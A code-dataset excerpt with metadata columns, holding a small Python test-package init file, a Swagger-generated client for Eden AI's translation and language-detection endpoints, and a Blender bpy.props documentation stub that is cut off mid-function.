| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc078976458933168eb04d7a4a8d5794afbbcb55
| 157
|
py
|
Python
|
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | 1
|
2021-04-27T01:22:38.000Z
|
2021-04-27T01:22:38.000Z
|
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit_tests/test_utils/__init__.py
|
yardencsGitHub/vak
|
04da97b02ded5acccab437c2538d0a1ded3bef80
|
[
"BSD-3-Clause"
] | null | null | null |
from . import test_bruteforce
from . import test_data
from . import test_general
from . import test_labels
from . import test_split
from . import test_utils
| 22.428571
| 29
| 0.808917
| 24
| 157
| 5.041667
| 0.375
| 0.495868
| 0.694215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152866
| 157
| 6
| 30
| 26.166667
| 0.909774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc0903f8fb1a47c4e34a919e3347ef447c340a2b
| 23,769
|
py
|
Python
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 20
|
2021-08-11T09:37:42.000Z
|
2022-01-14T08:05:49.000Z
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 2
|
2021-08-11T09:36:21.000Z
|
2022-03-13T13:49:53.000Z
|
edenai/api/translation_api.py
|
SamyMe/edenai-python
|
b92ca21086c90a0c31cd68ba92fff897811752d2
|
[
"Apache-2.0"
] | 7
|
2021-08-06T10:08:59.000Z
|
2022-01-29T22:10:45.000Z
|
# coding: utf-8
"""
Eden AI API Documentation
<a href=\"https://app.edenai.run/user/login\" target=\"_blank\"><img src=\"/static/images/welcome.png\"></a>. # Welcome Eden AI simplifies the use and integration of AI technologies by providing a unique API connected to the best AI engines and combined with a powerful management platform. The platform covers a wide range of AI technologies: * Vision: <a href=\"https://www.edenai.co/vision\" target=\"_blank\">www.edenai.co/vision</a>. * Text & NLP: <a href=\"https://www.edenai.co/text\" target=\"_blank\">www.edenai.co/text</a>. * Speech & Audio: <a href=\"https://www.edenai.co/speech\" target=\"_blank\">www.edenai.co/speech</a>. * OCR: <a href=\"https://www.edenai.co/ocr\" target=\"_blank\">www.edenai.co/ocr</a>. * Machine Translation: <a href=\"https://www.edenai.co/translation\" target=\"_blank\">www.edenai.co/translation</a>. * Prediction: <a href=\"https://www.edenai.co/prediction\" target=\"_blank\">www.edenai.co/prediction</a>. For all the proposed technologies, we provide a single endpoint: the service provider is only a parameter that can be changed very easily. All the engines available on Eden AI are listed here: www.edenai.co/catalog # Support & community ### 1- Support If you have any problems, please contact us at this email address: contact@edenai.co. We will be happy to help you in the use of Eden AI. ### 2- Community You can interact personally with other people actively using and working with Eden AI and join our <a href=\"https://join.slack.com/t/edenai/shared_invite/zt-t68c2pr9-4lDKQ_qEqmLiWNptQzB_6w\" target=\"_blank\">Slack community</a>. We are always updating our docs, so a good way to always stay up to date is to watch our documentation repo on Github: <a href=\"https://github.com/edenai\" target=\"_blank\">https://github.com/edenai</a>. ### 3- Blog We also regularly publish various articles with Eden AI news and technical articles on the different AI engines that exist. You can find these articles here: <a href=\"https://www.edenai.co/blog\" target=\"_blank\">https://www.edenai.co/blog</a>. # Authentication ## Create account  To create an account, please go to this link: <a href=\"https://app.edenai.run/user/login\" target=\"_blank\">app.edenai.run/user/login</a>. You can create an account with your email address or by using your account on available platforms (Gmail, Github, etc.). By creating an account with your email address, you will receive a confirmation email with a link to click. Check your spam if needed and contact us if you have any problem: contact@edenai.co  ## API key By going to your account page on the platform: <a href=\"https://app.edenai.run/admin/account\" target=\"_blank\">https://app.edenai.run/admin/account</a>, you will have access to your API key to start using the different AI engines offered by Eden AI.  # Portal Guide Eden AI provides a web portal that allows you to do several tasks:  ### 1- Benchmark and test The platform allows you to easily compare competing engines without having to code. By uploading your data, you have access to the prediction results of the different engines. This gives you a first overview of the performance of AI engines.  ### 2- Cost management The <a href=\"https://app.edenai.run/admin/cost-management\" target=\"_blank\">cost management page</a> also allows you to centralize the costs associated with the different engines with various filters to simplify the analysis. This page also allows you to define monthly budget limits not to be exceeded to secure the use of different AI engines.  ### 3- Account The <a href=\"https://app.edenai.run/admin/account\" target=\"_blank\">account page</a> allows you to change your information and password. It also gives you access to your API key that you can renew if needed. This page also allows you to add a credit card and to buy with credits to use all the engines offered by Eden AI.  # API Guide Eden AI API has different endpoints that refer to different AI services. The connected providers are thus parameters that the user can easily change. # noqa: E501
OpenAPI spec version: v1
Contact: contact@edenai.co
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from edenai.api_client import ApiClient
class TranslationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def automatic_translation(self, text, source_language, target_language, providers, **kwargs): # noqa: E501
"""automatic_translation # noqa: E501
Machine translation refers to the translation of a text into another language using rules, statics or ml technics. **SUPPORTED LANGUAGE** |Name|Type|Value| |----|----|-----| |**Afrikaans**|`string`|`af-AF`| |**Albanian**|`string`|`sq-SQ`| |**Amharic**|`string`|`am-AM`| |**Arabic**|`string`|`ar-XA`| |**Armenian**|`string`|`hy-HY`| |**Azerbaijani**|`string`|`az-AZ`| |**Basque**|`string`|`eu-BA`| |**Belarusian**|`string`|`be-BE`| |**Bengali**|`string`|`bn-BN`| |**Bosnian**|`string`|`bs-BS`| |**Bulgarian**|`string`|`bg-BG`| |**Catalan**|`string`|`ca-ES`| |**Cebuano**|`string`|`ceb-CB`| |**Chinese-Simplified**|`string`|`zh-CN`| |**Chinese-Traditional**|`string`|`zh-TW`| |**Corsican**|`string`|`co-CO`| |**Croatian**|`string`|`hr-HR`| |**Czech**|`string`|`cz-CZ`| |**Danish**|`string`|`da-DK`| |**Dutch**|`string`|`nl-NL`| |**English**|`string`|`en-US`| |**Esperanto**|`string`|`eo-EO`| |**Estonian**|`string`|`et-ET`| |**Finnish**|`string`|`fn-FN`| |**French**|`string`|`fr-FR`| |**French-Canadian**|`string`|`fr-CA`| |**Frisian**|`string`|`fy-FY`| |**Galician**|`string`|`gl-GL`| |**Georgian**|`string`|`ka-KA`| |**German**|`string`|`de-DE`| |**Greek**|`string`|`gr-GR`| |**Gujarati**|`string`|`gu-GU`| |**Haitian-Creole**|`string`|`ht-HT`| |**Hausa**|`string`|`ha-HA`| |**Hawaiian**|`string`|`haw-HA`| |**Hebrew**|`string`|`he-HE`| |**Hindi**|`string`|`hi-HI`| |**Hmong**|`string`|`hmn_HM`| |**Hungarian**|`string`|`hu-HU`| |**Icelandic**|`string`|`is-IS`| |**Igbo**|`string`|`ig-IG`| |**Indonesian**|`string`|`id-ID`| |**Irish**|`string`|`ga-IR`| |**Italian**|`string`|`it-IT`| |**Japanese**|`string`|`ja-JP`| |**Javanese**|`string`|`jv-JV`| |**Kannada**|`string`|`kn-KN`| |**Kazakh**|`string`|`kk-KK`| |**Khmer**|`string`|`km-KM`| |**Korean**|`string`|`ko-KR`| |**Kurdish**|`string`|`ku-KU`| |**Kyrgyz**|`string`|`ky-KY`| |**Lao**|`string`|`lo-LO`| |**Latin**|`string`|`la-LA`| |**Latvian**|`string`|`lv-LV`| |**Lithuanian**|`string`|`lt-LT`| |**Luxembourgish**|`string`|`lb-LB`| |**Macedonian**|`string`|`mk-MK`| |**Malagasy**|`string`|`mg-MG`| |**Malay**|`string`|`ms-MY`| |**Malayalam**|`string`|`ml-ML`| |**Maltese**|`string`|`mt-MT`| |**Maori**|`string`|`mi-MI`| |**Marathi**|`string`|`mr-MR`| |**Mongolian**|`string`|`mn-MN`| |**Myanmar-Burmese**|`string`|`my-MY`| |**Nepali**|`string`|`ne-NE`| |**Norwegian**|`string`|`no-NO`| |**Nyanja Chichewa**|`string`|`ny-NY`| |**Pashto**|`string`|`ps-PS`| |**Persian**|`string`|`fa-FA`| |**Polish**|`string`|`pl-PO`| |**Portuguese**|`string`|`pt-PT`| |**Punjabi**|`string`|`pa-PA`| |**Romanian**|`string`|`ro-RO`| |**Russian**|`string`|`ru-RU`| |**Samoan**|`string`|`sm-SM`| |**Scots Gaelic**|`string`|`gd-GD`| |**Serbian**|`string`|`sr-SR`| |**Sesotho**|`string`|`st-ST`| |**Shona**|`string`|`sn-SN`| |**Sindhi**|`string`|`sd-SD`| |**Sinhala-Sinhalese**|`string`|`si-SI`| |**Slovak**|`string`|`sk-SK`| |**Slovenian**|`string`|`sl-SL`| |**Somali**|`string`|`so-SO`| |**Spanish**|`string`|`es-ES`| |**Sundanese**|`string`|`su-SU`| |**Swahili**|`string`|`sh-SH`| |**Swedish**|`string`|`sw-SW`| |**Tagalog-Filipino**|`string`|`tl-TL`| |**Tajik**|`string`|`tg-TG`| |**Tamil**|`string`|`ta-TA`| |**Telugu**|`string`|`te-TE`| |**Thai**|`string`|`th-TH`| |**Turkish**|`string`|`tr-TR`| |**Ukrainian**|`string`|`uk-UK`| |**Urdu**|`string`|`ur-UR`| |**Uzbek**|`string`|`uz-UZ`| |**Vietnamese**|`string`|`vi-VI`| |**Welsh**|`string`|`cy-CY`| |**Xhosa**|`string`|`xh-XH`| |**Yiddish**|`string`|`yi-YI`| |**Yoruba**|`string`|`yo-YO`| **AVAILABLE PROVIDERS** |Name|Value|Version| |----|-----|-------| |[**Microsoft Azure**](https://www.edenai.co/catalog/azure-translator)|`microsoft`|`v3.0`| |[**Amazon Web Services**](https://www.edenai.co/catalog/amazon-translate)|`amazon`|`boto3 (v1.15.18)`| |[**Google Cloud**](https://www.edenai.co/catalog/google-cloud-translation)|`google`|`v3`| # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.automatic_translation(text, source_language, target_language, providers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: (required)
:param str source_language: (required)
:param str target_language: (required)
:param str providers: (required)
:return: InlineResponse2007
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.automatic_translation_with_http_info(text, source_language, target_language, providers, **kwargs) # noqa: E501
else:
(data) = self.automatic_translation_with_http_info(text, source_language, target_language, providers, **kwargs) # noqa: E501
return data
def automatic_translation_with_http_info(self, text, source_language, target_language, providers, **kwargs): # noqa: E501
"""automatic_translation # noqa: E501
Machine translation refers to the translation of a text into another language using rules, statics or ml technics. **SUPPORTED LANGUAGE** |Name|Type|Value| |----|----|-----| |**Afrikaans**|`string`|`af-AF`| |**Albanian**|`string`|`sq-SQ`| |**Amharic**|`string`|`am-AM`| |**Arabic**|`string`|`ar-XA`| |**Armenian**|`string`|`hy-HY`| |**Azerbaijani**|`string`|`az-AZ`| |**Basque**|`string`|`eu-BA`| |**Belarusian**|`string`|`be-BE`| |**Bengali**|`string`|`bn-BN`| |**Bosnian**|`string`|`bs-BS`| |**Bulgarian**|`string`|`bg-BG`| |**Catalan**|`string`|`ca-ES`| |**Cebuano**|`string`|`ceb-CB`| |**Chinese-Simplified**|`string`|`zh-CN`| |**Chinese-Traditional**|`string`|`zh-TW`| |**Corsican**|`string`|`co-CO`| |**Croatian**|`string`|`hr-HR`| |**Czech**|`string`|`cz-CZ`| |**Danish**|`string`|`da-DK`| |**Dutch**|`string`|`nl-NL`| |**English**|`string`|`en-US`| |**Esperanto**|`string`|`eo-EO`| |**Estonian**|`string`|`et-ET`| |**Finnish**|`string`|`fn-FN`| |**French**|`string`|`fr-FR`| |**French-Canadian**|`string`|`fr-CA`| |**Frisian**|`string`|`fy-FY`| |**Galician**|`string`|`gl-GL`| |**Georgian**|`string`|`ka-KA`| |**German**|`string`|`de-DE`| |**Greek**|`string`|`gr-GR`| |**Gujarati**|`string`|`gu-GU`| |**Haitian-Creole**|`string`|`ht-HT`| |**Hausa**|`string`|`ha-HA`| |**Hawaiian**|`string`|`haw-HA`| |**Hebrew**|`string`|`he-HE`| |**Hindi**|`string`|`hi-HI`| |**Hmong**|`string`|`hmn_HM`| |**Hungarian**|`string`|`hu-HU`| |**Icelandic**|`string`|`is-IS`| |**Igbo**|`string`|`ig-IG`| |**Indonesian**|`string`|`id-ID`| |**Irish**|`string`|`ga-IR`| |**Italian**|`string`|`it-IT`| |**Japanese**|`string`|`ja-JP`| |**Javanese**|`string`|`jv-JV`| |**Kannada**|`string`|`kn-KN`| |**Kazakh**|`string`|`kk-KK`| |**Khmer**|`string`|`km-KM`| |**Korean**|`string`|`ko-KR`| |**Kurdish**|`string`|`ku-KU`| |**Kyrgyz**|`string`|`ky-KY`| |**Lao**|`string`|`lo-LO`| |**Latin**|`string`|`la-LA`| |**Latvian**|`string`|`lv-LV`| |**Lithuanian**|`string`|`lt-LT`| |**Luxembourgish**|`string`|`lb-LB`| |**Macedonian**|`string`|`mk-MK`| |**Malagasy**|`string`|`mg-MG`| |**Malay**|`string`|`ms-MY`| |**Malayalam**|`string`|`ml-ML`| |**Maltese**|`string`|`mt-MT`| |**Maori**|`string`|`mi-MI`| |**Marathi**|`string`|`mr-MR`| |**Mongolian**|`string`|`mn-MN`| |**Myanmar-Burmese**|`string`|`my-MY`| |**Nepali**|`string`|`ne-NE`| |**Norwegian**|`string`|`no-NO`| |**Nyanja Chichewa**|`string`|`ny-NY`| |**Pashto**|`string`|`ps-PS`| |**Persian**|`string`|`fa-FA`| |**Polish**|`string`|`pl-PO`| |**Portuguese**|`string`|`pt-PT`| |**Punjabi**|`string`|`pa-PA`| |**Romanian**|`string`|`ro-RO`| |**Russian**|`string`|`ru-RU`| |**Samoan**|`string`|`sm-SM`| |**Scots Gaelic**|`string`|`gd-GD`| |**Serbian**|`string`|`sr-SR`| |**Sesotho**|`string`|`st-ST`| |**Shona**|`string`|`sn-SN`| |**Sindhi**|`string`|`sd-SD`| |**Sinhala-Sinhalese**|`string`|`si-SI`| |**Slovak**|`string`|`sk-SK`| |**Slovenian**|`string`|`sl-SL`| |**Somali**|`string`|`so-SO`| |**Spanish**|`string`|`es-ES`| |**Sundanese**|`string`|`su-SU`| |**Swahili**|`string`|`sh-SH`| |**Swedish**|`string`|`sw-SW`| |**Tagalog-Filipino**|`string`|`tl-TL`| |**Tajik**|`string`|`tg-TG`| |**Tamil**|`string`|`ta-TA`| |**Telugu**|`string`|`te-TE`| |**Thai**|`string`|`th-TH`| |**Turkish**|`string`|`tr-TR`| |**Ukrainian**|`string`|`uk-UK`| |**Urdu**|`string`|`ur-UR`| |**Uzbek**|`string`|`uz-UZ`| |**Vietnamese**|`string`|`vi-VI`| |**Welsh**|`string`|`cy-CY`| |**Xhosa**|`string`|`xh-XH`| |**Yiddish**|`string`|`yi-YI`| |**Yoruba**|`string`|`yo-YO`| **AVAILABLE PROVIDERS** |Name|Value|Version| |----|-----|-------| |[**Microsoft Azure**](https://www.edenai.co/catalog/azure-translator)|`microsoft`|`v3.0`| |[**Amazon Web Services**](https://www.edenai.co/catalog/amazon-translate)|`amazon`|`boto3 (v1.15.18)`| |[**Google Cloud**](https://www.edenai.co/catalog/google-cloud-translation)|`google`|`v3`| # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.automatic_translation_with_http_info(text, source_language, target_language, providers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: (required)
:param str source_language: (required)
:param str target_language: (required)
:param str providers: (required)
:return: InlineResponse2007
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['text', 'source_language', 'target_language', 'providers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method automatic_translation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'text' is set
if ('text' not in params or
params['text'] is None):
raise ValueError("Missing the required parameter `text` when calling `automatic_translation`") # noqa: E501
# verify the required parameter 'source_language' is set
if ('source_language' not in params or
params['source_language'] is None):
raise ValueError("Missing the required parameter `source_language` when calling `automatic_translation`") # noqa: E501
# verify the required parameter 'target_language' is set
if ('target_language' not in params or
params['target_language'] is None):
raise ValueError("Missing the required parameter `target_language` when calling `automatic_translation`") # noqa: E501
# verify the required parameter 'providers' is set
if ('providers' not in params or
params['providers'] is None):
raise ValueError("Missing the required parameter `providers` when calling `automatic_translation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
if 'source_language' in params:
form_params.append(('source_language', params['source_language'])) # noqa: E501
if 'target_language' in params:
form_params.append(('target_language', params['target_language'])) # noqa: E501
if 'providers' in params:
form_params.append(('providers', params['providers'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/pretrained/translation/automatic_translation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2007', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def langiage_detection(self, text, providers, **kwargs): # noqa: E501
"""langiage_detection # noqa: E501
Language Detection or language guessing is the algorithm of determining which natural language given content is in. **AVAILABLE PROVIDERS** |Name|Value|Version| |----|-----|-------| |[**Microsoft Azure**](https://www.edenai.co/catalog/azure-translator)|`microsoft`|`v3.1`| |[**Amazon Web Services**](https://www.edenai.co/catalog/amazon-translate)|`amazon`|`boto3 (v1.15.18)`| |[**Google Cloud**](https://www.edenai.co/catalog/google-cloud-translation)|`google`|`v1`| |[**Lettria**](https://www.edenai.co/catalog/Lettria)|`lettria`|`v5.5.2`| # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.langiage_detection(text, providers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: (required)
:param str providers: (required)
:return: InlineResponse2008
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.langiage_detection_with_http_info(text, providers, **kwargs) # noqa: E501
else:
(data) = self.langiage_detection_with_http_info(text, providers, **kwargs) # noqa: E501
return data
def langiage_detection_with_http_info(self, text, providers, **kwargs): # noqa: E501
"""langiage_detection # noqa: E501
Language Detection or language guessing is the algorithm of determining which natural language given content is in. **AVAILABLE PROVIDERS** |Name|Value|Version| |----|-----|-------| |[**Microsoft Azure**](https://www.edenai.co/catalog/azure-translator)|`microsoft`|`v3.1`| |[**Amazon Web Services**](https://www.edenai.co/catalog/amazon-translate)|`amazon`|`boto3 (v1.15.18)`| |[**Google Cloud**](https://www.edenai.co/catalog/google-cloud-translation)|`google`|`v1`| |[**Lettria**](https://www.edenai.co/catalog/Lettria)|`lettria`|`v5.5.2`| # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.langiage_detection_with_http_info(text, providers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: (required)
:param str providers: (required)
:return: InlineResponse2008
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['text', 'providers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method langiage_detection" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'text' is set
if ('text' not in params or
params['text'] is None):
raise ValueError("Missing the required parameter `text` when calling `langiage_detection`") # noqa: E501
# verify the required parameter 'providers' is set
if ('providers' not in params or
params['providers'] is None):
raise ValueError("Missing the required parameter `providers` when calling `langiage_detection`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
if 'providers' in params:
form_params.append(('providers', params['providers'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/pretrained/translation/language_detection', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2008', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 90.034091
| 4,375
| 0.633683
| 3,018
| 23,769
| 4.898277
| 0.195494
| 0.022188
| 0.021579
| 0.023811
| 0.784076
| 0.759859
| 0.72739
| 0.718596
| 0.716363
| 0.708787
| 0
| 0.010492
| 0.165972
| 23,769
| 263
| 4,376
| 90.376426
| 0.73522
| 0.687997
| 0
| 0.70073
| 0
| 0
| 0.228538
| 0.058306
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036496
| false
| 0
| 0.029197
| 0
| 0.116788
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
040a4aa35d3b3939429edd233d1db612a66e5b5c
| 10,232
|
py
|
Python
|
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | 23
|
2015-04-18T02:37:19.000Z
|
2021-12-20T23:59:28.000Z
|
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | null | null | null |
blenderlib/bpy.props.py
|
kabuku/blender-python
|
6e8eee4cd79242bb0a3cd1dd848da04bfe0a9182
|
[
"MIT"
] | 5
|
2017-05-06T07:20:40.000Z
|
2021-11-08T18:35:43.000Z
|
'''Property Definitions (bpy.props)
This module defines properties to extend blenders internal data, the result of these functions is used to assign properties to classes registered with blender and can't be used directly.
'''
def BoolProperty(name="", description="", default=False, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
'''Returns a new boolean property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def BoolVectorProperty(name="", description="", default=(False, False, False), options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
'''Returns a new vector boolean property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@default (sequence): sequence of booleans the length of *size*.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
@size (int): Vector dimensions in [1, and 32].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def CollectionProperty(items, type="", description="", options={'ANIMATABLE'}):
'''Returns a new collection property definition.
Arguments:
@type (class): A subclass of bpy.types.PropertyGroup.
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
'''
pass
def EnumProperty(items, name="", description="", default="", options={'ANIMATABLE'}, update=None, get=None, set=None):
'''Returns a new enumerator property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@default (string or set): The default value for this enum, A string when *ENUM_FLAG*is disabled otherwise a set which may only contain string identifiers
used in *items*.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'ENUM_FLAG', 'LIBRARY_EDITABLE'].
@items (sequence of string triples or a function): sequence of enum items formatted:[(identifier, name, description, icon, number), ...] where the identifier is used
for python access and other values are used for the interface.
Note the item is optional.
For dynamic values a callback can be passed which returns a list in
the same format as the static list.
This function must take 2 arguments (self, context)
WARNING: Do not use generators here (they will work the first time, but will lead to empty values
in some unload/reload scenarii)!
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def FloatProperty(name="", description="", default=0.0, min=sys.float_info.min, max=sys.float_info.max, soft_min=sys.float_info.min, soft_max=sys.float_info.max, step=3, precision=2, options={'ANIMATABLE'}, subtype='NONE', unit='NONE', update=None, get=None, set=None):
'''Returns a new float property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
@unit (string): Enumerator in ['NONE', 'LENGTH', 'AREA', 'VOLUME', 'ROTATION', 'TIME', 'VELOCITY', 'ACCELERATION'].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def FloatVectorProperty(name="", description="", default=(0.0, 0.0, 0.0), min=sys.float_info.min, max=sys.float_info.max, soft_min=sys.float_info.min, soft_max=sys.float_info.max, step=3, precision=2, options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
'''Returns a new vector float property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@default (sequence): sequence of floats the length of *size*.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['COLOR', 'TRANSLATION', 'DIRECTION', 'VELOCITY', 'ACCELERATION', 'MATRIX', 'EULER', 'QUATERNION', 'AXISANGLE', 'XYZ', 'COLOR_GAMMA', 'LAYER', 'NONE'].
@unit (string): Enumerator in ['NONE', 'LENGTH', 'AREA', 'VOLUME', 'ROTATION', 'TIME', 'VELOCITY', 'ACCELERATION'].
@size (int): Vector dimensions in [1, and 32].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def IntProperty(name="", description="", default=0, min=-sys.maxint, max=sys.maxint, soft_min=-sys.maxint, soft_max=sys.maxint, step=1, options={'ANIMATABLE'}, subtype='NONE', update=None, get=None, set=None):
'''Returns a new int property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
@subtype (string): Enumerator in ['UNSIGNED', 'PERCENTAGE', 'FACTOR', 'ANGLE', 'TIME', 'DISTANCE', 'NONE'].
@update (function): function to be called when this value is modified,This function must take 2 values (self, context) and return None.
*Warning* there are no safety checks to avoid infinite recursion.
'''
pass
def IntVectorProperty(name="", description="", default=(0, 0, 0), min=-sys.maxint, max=sys.maxint, soft_min=-sys.maxint, soft_max=sys.maxint, options={'ANIMATABLE'}, subtype='NONE', size=3, update=None, get=None, set=None):
'''Returns a new vector int property definition.
Arguments:
@name (string): Name used in the user interface.
@description (string): Text used for the tooltip and api documentation.
@default (sequence): sequence of ints the length of *size*.
@options (set): Enumerator in ['HIDDEN', 'SKIP_SAVE', 'ANIMATABLE', 'LIBRARY_EDITABLE'].
